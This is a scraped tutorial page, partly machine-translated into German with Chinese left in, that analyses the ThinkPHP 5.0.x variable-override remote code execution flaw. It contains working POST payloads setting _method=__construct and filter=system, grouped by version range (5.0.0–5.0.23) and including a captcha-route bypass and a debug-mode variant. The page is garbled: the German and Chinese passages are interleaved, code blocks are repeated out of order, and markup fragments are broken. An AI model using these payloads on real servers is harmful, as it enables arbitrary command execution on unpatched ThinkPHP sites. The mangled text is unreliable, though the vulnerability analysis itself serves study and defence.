Heim > PHP-Framework > Denken Sie an PHP > Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird

Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird

藏色散人
Freigeben: 2021-04-21 11:07:10
nach vorne
3013 Leute haben es durchsucht

Die folgende Tutorial-Kolumne von thinkphp stellt Ihnen die RCE-Analyse vor, die durch die variable Abdeckung der Vollversion von thinkphp5.0.X verursacht wird. Ich hoffe, dass sie Freunden in Not hilfreich sein wird!

Einführung

Ich stoße immer auf einige Unterschiede von thinkphp5.0, wie zum Beispiel die folgenden.

_method=__construct&filter=system&a=whoami
_method=__construct&filter=system&a=whoami&method=GET
_method=__construct&filter=system&get[]=whoami
...
Nach dem Login kopieren

Obwohl die Nutzlast korrekt ist, verwirrt sie mich und ich weiß nicht warum.
Was sind die Unterschiede zwischen diesen Typen?
Welche Funktion haben die einzelnen Parameter?
Warum passiert das?

Analysis

thinkphp hat zwei Versionen, eine ist die Kernversion und die andere ist die Vollversion. Um es einfach auszudrücken: Die Kernversion enthält keine Bibliotheken von Drittanbietern, wie z. B. Verifizierungscode-Bibliotheken (Hervorhebung hinzugefügt, wird später verwendet).

Ab 5.0.0 sieht die Codeausführungsnutzlast, die für 5.0.0 gilt, wie folgt aus

POST /thinkphp5.0.0 HTTP/1.1

_method=__construct&filter=system&a=whoami&method=GET
Nach dem Login kopieren

Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird
Warum _method=__construct_method=__construct
为什么 filter=system
为什么 a=whoami
为什么 method=GET

thinkphp的入口文件为public/index.php,如下。

// 定义应用目录
define('APP_PATH', __DIR__ . '/../application/');
// 加载框架引导文件
require __DIR__ . '/../thinkphp/start.php';
Nach dem Login kopieren

跟进thinkphp/start.php

// 1. 加载基础文件
require __DIR__ . '/base.php';

// 2. 执行应用
App::run()->send();
Nach dem Login kopieren

看到是调用的是App::run()执行应用。
跟进thinkphp/library/think/App.php下的run()函数。

    /**
     * 执行应用程序
     * @access public
     * @param Request $request Request对象
     * @return Response
     * @throws Exception
     */
    public static function run(Request $request = null)
    {
        ...

            // 获取应用调度信息
            $dispatch = self::$dispatch;
            if (empty($dispatch)) {
                // 进行URL路由检测
                $dispatch = self::routeCheck($request, $config);
            }
            // 记录当前调度信息
            $request->dispatch($dispatch);
        ...
     }
Nach dem Login kopieren

run()函数中,会根据请求的信息调用self::routeCheck()函数,进行URL路由检测设置调度信息并赋值给$dispatch

    /**
     * URL路由检测(根据PATH_INFO)
     * @access public
     * @param  \think\Request $request
     * @param  array          $config
     * @return array
     * @throws \think\Exception
     */
    public static function routeCheck($request, array $config)
    {
        ...
            // 路由检测(根据路由定义返回不同的URL调度)
            $result = Route::check($request, $path, $depr, $config['url_domain_deploy']);
        ...
        return $result;
    }
Nach dem Login kopieren

其中的Route::check()函数如下。

    /**
     * 检测URL路由
     * @access public
     * @param Request   $request Request请求对象
     * @param string    $url URL地址
     * @param string    $depr URL分隔符
     * @param bool      $checkDomain 是否检测域名规则
     * @return false|array
     */
    public static function check($request, $url, $depr = '/', $checkDomain = false)
    {
        ...
        $method = $request->method();
        // 获取当前请求类型的路由规则
        $rules = self::$rules[$method];
        ...
Nach dem Login kopieren

会调用$request->method()函数获取当前请求类型。

    /**
     * 当前的请求类型
     * @access public
     * @param bool $method  true 获取原始请求类型
     * @return string
     */
    public function method($method = false)
    {
        if (true === $method) {
            // 获取原始请求类型
            return IS_CLI ? 'GET' : (isset($this->server['REQUEST_METHOD']) ? $this->server['REQUEST_METHOD'] : $_SERVER['REQUEST_METHOD']);
        } elseif (!$this->method) {
            if (isset($_POST[Config::get('var_method')])) {
                $this->method = strtoupper($_POST[Config::get('var_method')]);
                $this->{$this->method}($_POST);
        ...
        return $this->method;
    }
Nach dem Login kopieren

因为上面调用method()函数是没有传参的,所以这里$method = false,进入elseifvar_method是表单请求类型伪装变量,可在application/config.php中看到其值为_method

// 表单请求类型伪装变量
'var_method'             => '_method',
Nach dem Login kopieren

那么只要POST传递一个_method参数,即可进入下面的if,会执行

$this->method = strtoupper($_POST[Config::get('var_method')]);
$this->{$this->method}($_POST);
Nach dem Login kopieren

因此可通过指定_method来调用该类下的任意函数。
所以_method=__construct是为了调用thinkphp/library/think/Request.php下的__construct函数。需要注意的是这里同时也将Request类下的$method的值覆盖为__construct了,这个很重要,先记录下。

method => __construct
Nach dem Login kopieren

那为啥要调用__construct函数完成攻击链,不是别的函数呢?
跟进函数,如下。

    /**
     * 架构函数
     * @access public
     * @param array $options 参数
     */
    public function __construct($options = [])
    {
        foreach ($options as $name => $item) {
            if (property_exists($this, $name)) {
                $this->$name = $item;
            }
        }
        if (is_null($this->filter)) {
            $this->filter = Config::get('default_filter');
        }
    }
Nach dem Login kopieren

上面调用__construct函数的时候把$_POST数组传进去了,也就是会用foreach遍历POST提交的数据,接着使用property_exists()检测当前类是否具有该属性,如果存在则赋值,而$name$item都是来自$_POST,完全可控,这里就存在一个变量覆盖的问题。filter=system&method=GET 作用就是把当前类下的$filter覆盖为system,$method覆盖为GET,当前变量情况:

method => __construct => GET
filter => system
Nach dem Login kopieren

为什么要把method又覆盖一遍成GET?,因为前面在check()函数中有这么两行代码。

$method = $request->method();
// 获取当前请求类型的路由规则
$rules = self::$rules[$method];
Nach dem Login kopieren

前面已经在method()函数中进行了变量覆盖,$method的值为__construct。而$rules的定义如下:

    private static $rules = [
        'GET'     => [],
        'POST'    => [],
        'PUT'     => [],
        'DELETE'  => [],
        'PATCH'   => [],
        'HEAD'    => [],
        'OPTIONS' => [],
        '*'       => [],
        'alias'   => [],
        'domain'  => [],
        'pattern' => [],
        'name'    => [],
    ];
Nach dem Login kopieren

那么如果不再次覆盖$methodGET、POST、PUT等等,self::$rules[$method]就为self::$rules['__construct'],程序就得报错了嘛。

应用调度信息后获取完毕后,若开启了debug,则会记录路由和请求信息。这也是很重要的一点,先记录。

if (self::$debug) {
                Log::record('[ ROUTE ] ' . var_export($dispatch, true), 'info');
                Log::record('[ HEADER ] ' . var_export($request->header(), true), 'info');
                Log::record('[ PARAM ] ' . var_export($request->param(), true), 'info');
            }
Nach dem Login kopieren

再根据$dispatch类型的不同进入switch case处理。

            switch ($dispatch['type']) {
                case 'redirect':
                    // 执行重定向跳转
                    $data = Response::create($dispatch['url'], 'redirect')->code($dispatch['status']);
                    break;
                case 'module':
                    // 模块/控制器/操作
                    $data = self::module($dispatch['module'], $config, isset($dispatch['convert']) ? $dispatch['convert'] : null);
                    break;
                case 'controller':
                    // 执行控制器操作
                    $data = Loader::action($dispatch['controller']);
                    break;
                case 'method':
                    // 执行回调方法
                    $data = self::invokeMethod($dispatch['method']);
                    break;
                case 'function':
                    // 执行闭包
                    $data = self::invokeFunction($dispatch['function']);
                    break;
                case 'response':
                    $data = $dispatch['response'];
                    break;
                default:
                    throw new \InvalidArgumentException('dispatch type not support');
            }
Nach dem Login kopieren

直接访问public/index.php默认调用的模块名/控制器名/操作名/index/index/index,具体定义在application/config.php Warum filter=system</ code></p> Warum <code>a=whoami🎜 Warum method=GET🎜🎜Die Eingabedatei von thinkphp ist public/index.php, wie folgt. 🎜

// 默认模块名
&#39;default_module&#39;         => &#39;index&#39;,
// 禁止访问模块
&#39;deny_module_list&#39;       => [&#39;common&#39;],
// 默认控制器名
&#39;default_controller&#39;     => &#39;Index&#39;,
// 默认操作名
&#39;default_action&#39;         => &#39;index&#39;,
Nach dem Login kopieren
Nach dem Login kopieren
🎜Folgen Sie mit thinkphp/start.php fort. 🎜
case &#39;module&#39;:
                    // 模块/控制器/操作
                    $data = self::module($dispatch[&#39;module&#39;], $config, isset($dispatch[&#39;convert&#39;]) ? $dispatch[&#39;convert&#39;] : null);
                    break;
Nach dem Login kopieren
Nach dem Login kopieren
🎜Sehen Sie, dass App::run() aufgerufen wird, um die Anwendung auszuführen. 🎜 Folgen Sie der Funktion run() unter thinkphp/library/think/App.php. 🎜
    /**
     * 执行模块
     * @access public
     * @param array $result 模块/控制器/操作
     * @param array $config 配置参数
     * @param bool  $convert 是否自动转换控制器和操作名
     * @return mixed
     */
    public static function module($result, $config, $convert = null)
    {
     ...
            $data = self::invokeMethod($call);
     ...
Nach dem Login kopieren
Nach dem Login kopieren
🎜In der Funktion run() wird die Funktion self::routeCheck() entsprechend den angeforderten Informationen aufgerufen, um die URL-Routing-Erkennung durchzuführen und die Planungsinformationen festzulegen und weisen Sie es $dispatch zu. 🎜
   /**
     * 调用反射执行类的方法 支持参数绑定
     * @access public
     * @param string|array $method 方法
     * @param array        $vars   变量
     * @return mixed
     */
    public static function invokeMethod($method, $vars = [])
    {
        ...
        $args = self::bindParams($reflect, $vars);
        ...
    }
Nach dem Login kopieren
Nach dem Login kopieren
🎜Die Funktion Route::check() lautet wie folgt. 🎜
    /**
     * 绑定参数
     * @access public
     * @param \ReflectionMethod|\ReflectionFunction $reflect 反射类
     * @param array             $vars    变量
     * @return array
     */
    private static function bindParams($reflect, $vars = [])
    {
        if (empty($vars)) {
            // 自动获取请求变量
            if (Config::get(&#39;url_param_type&#39;)) {
                $vars = Request::instance()->route();
            } else {
                $vars = Request::instance()->param();
            }
        }
Nach dem Login kopieren
Nach dem Login kopieren
🎜 ruft die Funktion $request->method() auf, um den aktuellen Anfragetyp abzurufen. 🎜
    /**
     * 设置获取获取当前请求的参数
     * @access public
     * @param string|array  $name 变量名
     * @param mixed         $default 默认值
     * @param string|array  $filter 过滤方法
     * @return mixed
     */
    public function param($name = &#39;&#39;, $default = null, $filter = null)
    {
        if (empty($this->param)) {
            $method = $this->method(true);
            // 自动获取请求变量
            switch ($method) {
                case &#39;POST&#39;:
                    $vars = $this->post(false);
                    break;
                case &#39;PUT&#39;:
                case &#39;DELETE&#39;:
                case &#39;PATCH&#39;:
                    $vars = $this->put(false);
                    break;
                default:
                    $vars = [];
            }
            // 当前请求参数和URL地址中的参数合并
            $this->param = array_merge($this->get(false), $vars, $this->route(false));
        }
        if (true === $name) {
            // 获取包含文件上传信息的数组
            $file = $this->file();
            $data = array_merge($this->param, $file);
            return $this->input($data, &#39;&#39;, $default, $filter);
        }
        return $this->input($this->param, $name, $default, $filter);
    }
Nach dem Login kopieren
Nach dem Login kopieren
🎜Da in der oben aufgerufenen Funktion method() kein Parameter übergeben wird, geben Sie hier $method = false elseif ein. var_method ist eine Maskierungsvariable für den Formularanforderungstyp, und ihr Wert kann in application/config.php als _method angezeigt werden. 🎜
a=whoami
aaaaa=whoami
get[]=whoami
route=whoami
Nach dem Login kopieren
Nach dem Login kopieren
🎜 Solange POST dann einen _method-Parameter übergibt, können Sie das folgende if eingeben, das ausgeführt wird 🎜
    /**
     * 获取变量 支持过滤和默认值
     * @param array         $data 数据源
     * @param string|false  $name 字段名
     * @param mixed         $default 默认值
     * @param string|array  $filter 过滤函数
     * @return mixed
     */
    public function input($data = [], $name = &#39;&#39;, $default = null, $filter = null)
    {
        ...
        if (is_array($data)) {
            array_walk_recursive($data, [$this, &#39;filterValue&#39;], $filter);
            reset($data);
        } else {
            $this->filterValue($data, $name, $filter);
        }
        ...
    }
Nach dem Login kopieren
Nach dem Login kopieren
🎜Sie können also jede Funktion unter dieser Klasse aufrufen, indem Sie _method</ angeben Code> . 🎜 <code>_method=__construct besteht also darin, die Funktion __construct unter 🎜thinkphp/library/think/Request.php🎜 aufzurufen. Es ist zu beachten, dass der Wert von $method unter der Klasse Request auch mit __construct überschrieben wird. Dies ist sehr wichtig, also notieren Sie ihn zuerst . 🎜
/**
 * 递归过滤给定的值
 * @param mixed     $value 键值
 * @param mixed     $key 键名
 * @param array     $filters 过滤方法+默认值
 * @return mixed
 */
private function filterValue(&$value, $key, $filters)
{
    $default = array_pop($filters);
    foreach ($filters as $filter) {
        if (is_callable($filter)) {
            // 调用函数或者方法过滤
            $value = call_user_func($filter, $value);
    ...
Nach dem Login kopieren
Nach dem Login kopieren
🎜Warum müssen wir dann die Funktion __construct aufrufen, um die Angriffskette abzuschließen, und nicht eine andere Funktion? 🎜Follow-up-Funktion wie folgt. 🎜
_method=__construct&filter=system&a=whoami
Nach dem Login kopieren
Nach dem Login kopieren
🎜Beim Aufruf der Funktion __construct oben wurde das Array $_POST übergeben, was bedeutet, dass foreach zum Durchlaufen der Daten verwendet wird übermittelt durch 🎜POST🎜, dann verwenden Sie property_exists(), um zu erkennen, ob die aktuelle Klasse dieses Attribut hat, und weisen Sie einen Wert zu, falls vorhanden, sowie $name und $item stammen beide von < code>$_POST, vollständig kontrollierbar, es gibt ein Problem der Variablenabdeckung. Die Funktion von filter=system&method=GET besteht darin, $filter unter der aktuellen Klasse durch system und $method</code zu überschreiben > zu <code>GET, aktuelle Variablensituation: 🎜
    // 设置默认过滤机制
    $request->filter($config[&#39;default_filter&#39;]);
Nach dem Login kopieren
Nach dem Login kopieren
🎜Warum sollten wir method erneut in GET überschreiben? , da die Funktion check() zwei Codezeilen enthält. 🎜
// 记录路由和请求信息
            if (self::$debug) {
                Log::record(&#39;[ ROUTE ] &#39; . var_export($dispatch, true), &#39;info&#39;);
                Log::record(&#39;[ HEADER ] &#39; . var_export($request->header(), true), &#39;info&#39;);
                Log::record(&#39;[ PARAM ] &#39; . var_export($request->param(), true), &#39;info&#39;);
            }
Nach dem Login kopieren
Nach dem Login kopieren
🎜Das Überschreiben von Variablen wurde bereits in der Funktion method() durchgeführt, und der Wert von $method ist __construct. Die Definition von $rules lautet wie folgt: 🎜
\think\Route::get(&#39;captcha/[:id]&#39;, "\think\captcha\CaptchaController@index");
Nach dem Login kopieren
🎜 Dann, wenn Sie $method nicht erneut auf GET, POST, PUT usw. überschreiben, self ::$rules[$ method] ist self::$rules['__construct'] und das Programm meldet einen Fehler. 🎜🎜Nachdem die Anwendungsplanungsinformationen abgerufen wurden und 🎜Debug🎜 aktiviert ist, werden Routing- und Anforderungsinformationen aufgezeichnet. Das ist auch sehr wichtig, notieren Sie es zuerst. 🎜
POST /?s=captcha

_method=__construct&filter=system&method=GET&a=whoami
Nach dem Login kopieren
Nach dem Login kopieren
🎜Dann geben Sie switch case für die Verarbeitung basierend auf dem Typ $dispatch ein. 🎜
/**
 * 获取server参数
 * @access public
 * @param string|array  $name 数据名称
 * @param string        $default 默认值
 * @param string|array  $filter 过滤方法
 * @return mixed
 */
public function server($name = &#39;&#39;, $default = null, $filter = &#39;&#39;)
{
    if (empty($this->server)) {
        $this->server = $_SERVER;
    }
    if (is_array($name)) {
        return $this->server = array_merge($this->server, $name);
    }
    return $this->input($this->server, false === $name ? false : strtoupper($name), $default, $filter);
}
Nach dem Login kopieren
Nach dem Login kopieren
🎜Direkter Zugriff auf public/index.php. Der standardmäßig aufgerufene Modulname/Controllername/Operationsname ist /index/index/index, der speziell in definiert ist < inside code>application/config.php. 🎜
// 默认模块名
&#39;default_module&#39;         => &#39;index&#39;,
// 禁止访问模块
&#39;deny_module_list&#39;       => [&#39;common&#39;],
// 默认控制器名
&#39;default_controller&#39;     => &#39;Index&#39;,
// 默认操作名
&#39;default_action&#39;         => &#39;index&#39;,
Nach dem Login kopieren
Nach dem Login kopieren

因此对应的$dispatch[&#39;type&#39;]module,会调用module()函数,经过一系列的处理后返回数据到客户端。

case &#39;module&#39;:
                    // 模块/控制器/操作
                    $data = self::module($dispatch[&#39;module&#39;], $config, isset($dispatch[&#39;convert&#39;]) ? $dispatch[&#39;convert&#39;] : null);
                    break;
Nach dem Login kopieren
Nach dem Login kopieren

跟进module()函数,关键在invokeMethod()

    /**
     * 执行模块
     * @access public
     * @param array $result 模块/控制器/操作
     * @param array $config 配置参数
     * @param bool  $convert 是否自动转换控制器和操作名
     * @return mixed
     */
    public static function module($result, $config, $convert = null)
    {
     ...
            $data = self::invokeMethod($call);
     ...
Nach dem Login kopieren
Nach dem Login kopieren

invokeMethod()如下,跟进bindParams()

   /**
     * 调用反射执行类的方法 支持参数绑定
     * @access public
     * @param string|array $method 方法
     * @param array        $vars   变量
     * @return mixed
     */
    public static function invokeMethod($method, $vars = [])
    {
        ...
        $args = self::bindParams($reflect, $vars);
        ...
    }
Nach dem Login kopieren
Nach dem Login kopieren

bindParams()如下,跟进param()

    /**
     * 绑定参数
     * @access public
     * @param \ReflectionMethod|\ReflectionFunction $reflect 反射类
     * @param array             $vars    变量
     * @return array
     */
    private static function bindParams($reflect, $vars = [])
    {
        if (empty($vars)) {
            // 自动获取请求变量
            if (Config::get(&#39;url_param_type&#39;)) {
                $vars = Request::instance()->route();
            } else {
                $vars = Request::instance()->param();
            }
        }
Nach dem Login kopieren
Nach dem Login kopieren

这是关键点,param()函数是获取当前请求参数的。

    /**
     * 设置获取获取当前请求的参数
     * @access public
     * @param string|array  $name 变量名
     * @param mixed         $default 默认值
     * @param string|array  $filter 过滤方法
     * @return mixed
     */
    public function param($name = &#39;&#39;, $default = null, $filter = null)
    {
        if (empty($this->param)) {
            $method = $this->method(true);
            // 自动获取请求变量
            switch ($method) {
                case &#39;POST&#39;:
                    $vars = $this->post(false);
                    break;
                case &#39;PUT&#39;:
                case &#39;DELETE&#39;:
                case &#39;PATCH&#39;:
                    $vars = $this->put(false);
                    break;
                default:
                    $vars = [];
            }
            // 当前请求参数和URL地址中的参数合并
            $this->param = array_merge($this->get(false), $vars, $this->route(false));
        }
        if (true === $name) {
            // 获取包含文件上传信息的数组
            $file = $this->file();
            $data = array_merge($this->param, $file);
            return $this->input($data, &#39;&#39;, $default, $filter);
        }
        return $this->input($this->param, $name, $default, $filter);
    }
Nach dem Login kopieren
Nach dem Login kopieren

这里又会调用method()获取当前请求方法,然后会根据请求的类型来获取参数以及合并参数,参数的来源有get[],route[],$_POST,那么通过可以变量覆盖传参,也可以直接POST传参。
所以以下几种方式都是一样可行的:

a=whoami
aaaaa=whoami
get[]=whoami
route=whoami
Nach dem Login kopieren
Nach dem Login kopieren

最后调用input()函数

    /**
     * 获取变量 支持过滤和默认值
     * @param array         $data 数据源
     * @param string|false  $name 字段名
     * @param mixed         $default 默认值
     * @param string|array  $filter 过滤函数
     * @return mixed
     */
    public function input($data = [], $name = &#39;&#39;, $default = null, $filter = null)
    {
        ...
        if (is_array($data)) {
            array_walk_recursive($data, [$this, &#39;filterValue&#39;], $filter);
            reset($data);
        } else {
            $this->filterValue($data, $name, $filter);
        }
        ...
    }
Nach dem Login kopieren
Nach dem Login kopieren

input()函数中会通过filterValue()函数对传入的所有参数进行过滤,这里全局过滤函数已经在前面被覆盖为system并会在filterValue()函数中使用。

/**
 * 递归过滤给定的值
 * @param mixed     $value 键值
 * @param mixed     $key 键名
 * @param array     $filters 过滤方法+默认值
 * @return mixed
 */
private function filterValue(&$value, $key, $filters)
{
    $default = array_pop($filters);
    foreach ($filters as $filter) {
        if (is_callable($filter)) {
            // 调用函数或者方法过滤
            $value = call_user_func($filter, $value);
    ...
Nach dem Login kopieren
Nach dem Login kopieren

通过call_user_func()完成任意代码执行,这也就是filter为什么要覆盖成system的原因了,覆盖成别的函数也行,想执行什么覆盖成什么。

thinkphp5.0.8以后thinkphp/library/think/Route.php下的check()函数中有一处改动。
Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird
这里多了一处判断,所以不加method=GET也不会报错,可以正常执行。

_method=__construct&filter=system&a=whoami
Nach dem Login kopieren
Nach dem Login kopieren

Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird
测试到5.0.13版本,payload打过去没有反应,为什么?
Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird
跟踪代码发现thinkphp/library/think/App.php下的module()函数多了一行代码。

    // 设置默认过滤机制
    $request->filter($config[&#39;default_filter&#39;]);
Nach dem Login kopieren
Nach dem Login kopieren

前面通过变量覆盖把$filter覆盖成了system,这里又把$filter给二次覆盖回去了,导致攻击链断了。

前面提到过如果开启了debug模式,很重要,为什么呢?

// 记录路由和请求信息
            if (self::$debug) {
                Log::record(&#39;[ ROUTE ] &#39; . var_export($dispatch, true), &#39;info&#39;);
                Log::record(&#39;[ HEADER ] &#39; . var_export($request->header(), true), &#39;info&#39;);
                Log::record(&#39;[ PARAM ] &#39; . var_export($request->param(), true), &#39;info&#39;);
            }
Nach dem Login kopieren
Nach dem Login kopieren

最后一句会调用param()函数,而攻击链核心就是通过前面的变量覆盖全局过滤函数$filter,进入param()获取参数再进入input()进行全局过滤造成的代码执行。这里在$filter被二次覆盖之前调用了一次param(),也就是说如果开启了debug,在5.0.13开始也可以攻击,也是为什么有时候代码执行会返回两次结果的原因。
Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird
filter是在module函数中被覆盖回去的,而执行module函数是根据$dispatch的类型来决定的,那是否能不走module函数,绕过这里的覆盖呢?
完整版的thinkphp中,有提供验证码类库,其中的路由定义在vendor/topthink/think-captcha/src/helper.php中。

\think\Route::get(&#39;captcha/[:id]&#39;, "\\think\\captcha\\CaptchaController@index");
Nach dem Login kopieren

其对应的dispatch类型为method,完美的避开了二次覆盖,路由限定了请求类型为get,所以在5.0.13开始,如果没有开debug,还可以调用第三方类库完成攻击链。

POST /?s=captcha

_method=__construct&filter=system&method=GET&a=whoami
Nach dem Login kopieren
Nach dem Login kopieren

Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird
5.0.21版本开始,函数method()有所改动。
Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird
通过server()函数获取请求方法,并且其中调用了input()函数。

/**
 * 获取server参数
 * @access public
 * @param string|array  $name 数据名称
 * @param string        $default 默认值
 * @param string|array  $filter 过滤方法
 * @return mixed
 */
public function server($name = &#39;&#39;, $default = null, $filter = &#39;&#39;)
{
    if (empty($this->server)) {
        $this->server = $_SERVER;
    }
    if (is_array($name)) {
        return $this->server = array_merge($this->server, $name);
    }
    return $this->input($this->server, false === $name ? false : strtoupper($name), $default, $filter);
}
Nach dem Login kopieren
Nach dem Login kopieren

前面分析过了,最后代码执行是进入input()中完成的,所以只要能进入server()函数也可以造成代码执行。

POST /?s=captcha HTTP/1.1

_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=whoami
Nach dem Login kopieren

param()函数是根据method()返回值来获取参数的,现在method()的逻辑变了,如果不传递server[REQUEST_METHOD],返回的就是GET,阅读代码得知参数的来源有$param[]、$get[]、$route[],还是可以通过变量覆盖来传递参数,但是就不能用之前形如a=whoami任意参数名来传递了。

// 当前请求参数和URL地址中的参数合并
            $this->param      = array_merge($this->param, $this->get(false), $vars, $this->route(false));
Nach dem Login kopieren

在测试的时候发现只能通过覆盖get[]、route[]完成攻击,覆盖param[]却不行,调试后找到原因,原来是在route()函数里param[]又被二次覆盖了。

    /**
     * 设置获取路由参数
     * @access public
     * @param string|array  $name 变量名
     * @param mixed         $default 默认值
     * @param string|array  $filter 过滤方法
     * @return mixed
     */
    public function route($name = &#39;&#39;, $default = null, $filter = &#39;&#39;)
    {
        if (is_array($name)) {
            $this->param        = [];
            return $this->route = array_merge($this->route, $name);
        }
        return $this->input($this->route, $name, $default, $filter);
    }
Nach dem Login kopieren
POST /?s=captcha HTTP/1.1

_method=__construct&filter=system&method=GET&get[]=whoami
Nach dem Login kopieren

Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird
或者

POST /?s=captcha HTTP/1.1

_method=__construct&filter=system&method=GET&route[]=whoami
Nach dem Login kopieren

Informationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird

总结

各版本通用的变量覆盖payload如下
5.0.0~5.0.12 无条件触发

POST / HTTP/1.1

_method=__construct&filter=system&method=GET&a=whoami

a可以替换成get[]、route[]或者其他名字
Nach dem Login kopieren

5.0.13~5.0.23 需要有第三方类库 如完整版中的captcha

POST /?s=captcha HTTP/1.1

_method=__construct&filter=system&method=get&get[]=whoami

get[]可以换成route[]
Nach dem Login kopieren

5.0.13~5.0.23 需要开启debug

POST / HTTP/1.1

_method=__construct&filter=system&get[]=whoami

get[]可以替换成route[]
Nach dem Login kopieren

相关推荐:最新的10个thinkphp视频教程

Das obige ist der detaillierte Inhalt vonInformationen zur RCE-Analyse, die durch die Variablenabdeckung in der Vollversion von thinkphp5.0.X verursacht wird. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:csdn.net
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage